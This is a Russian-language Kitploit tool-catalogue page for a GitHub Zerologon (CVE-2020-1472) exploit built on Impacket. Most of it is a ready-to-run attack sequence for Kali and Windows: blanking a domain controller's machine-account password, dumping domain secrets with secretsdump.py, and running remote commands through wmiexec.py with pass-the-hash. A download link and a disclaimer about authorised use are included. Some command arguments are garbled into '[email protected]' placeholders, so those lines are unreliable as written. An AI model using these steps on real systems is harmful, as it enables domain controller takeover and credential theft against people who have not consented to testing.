Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/tuancui22/zerologonwithimpacket-cve2020-1472
Повышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияЛатеральное перемещениеПост-эксплуатацияТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
tuancui22/zerologonwithimpacket-cve2020-1472

ZerologonWithImpacket-CVE2020-1472

Практическое доказательство концепции для CVE-2020-1472 (Zerologon) с использованием библиотеки Impacket для эксплуатации уязвимости Netlogon и выполнения несанкционированного доступа к контроллеру домена.

Репозиторий
121 год назадЕщё не проверено

Комбинированный эксплойт Zerologon и Impacket (CVE-2020-1472)

Этот репозиторий содержит обновлённую реализацию (2024) эксплойта Zerologon в сочетании с инструментами Impacket для эксплуатации CVE-2020-1472 (Zerologon). Данный эксплойт нацелен на среды Windows Server для изменения пароля учётной записи компьютера и выполнения lateral movement.

Возможности

  • Эксплуатирует CVE-2020-1472 (Zerologon) для установки пустого пароля учётной записи компьютера цели.
  • Использует инструменты Impacket для дампа учётных данных и выполнения команд на машине жертвы.

Требования

  1. Python 3.x
  2. Установите необходимые зависимости, выполнив:
    root@kitploit:~
    pip install -r requirements.txt
    

Использование

Пример сценария

  • Жертва: Windows Server 2016
  • Атакующий: Kali Linux (или система Windows)

Команды эксплойта (Kali Linux)

  1. Установите пустой пароль учётной записи компьютера:
    root@kitploit:~
    python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Выполните дамп секретов с контроллера домена:
    root@kitploit:~
    python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
    
  3. Выполните команды на машине жертвы:
    root@kitploit:~
    python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Команды эксплойта (Windows-атакующий)

  1. Установите пустой пароль учётной записи компьютера:
    root@kitploit:~
    python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Выполните дамп секретов с контроллера домена:
    root@kitploit:~
    python secretsdump.py -just-dc "tancongmang/[email protected]"
    
  3. Выполните команды на машине жертвы:
    root@kitploit:~
    python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Примечания

  • Замените WIN-C9PAHHGJN91 и 192.168.40.145 на фактическое имя хоста и IP-адрес цели.
  • Убедитесь, что у вас есть надлежащее разрешение перед использованием этого инструмента.
  • Этот инструмент предназначен только для образовательных целей и тестирования на проникновение.

Отказ от ответственности

Используйте этот инструмент ответственно. Несанкционированное использование данного инструмента для эксплуатации систем без явного разрешения является незаконным и неэтичным. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Скачать инструмент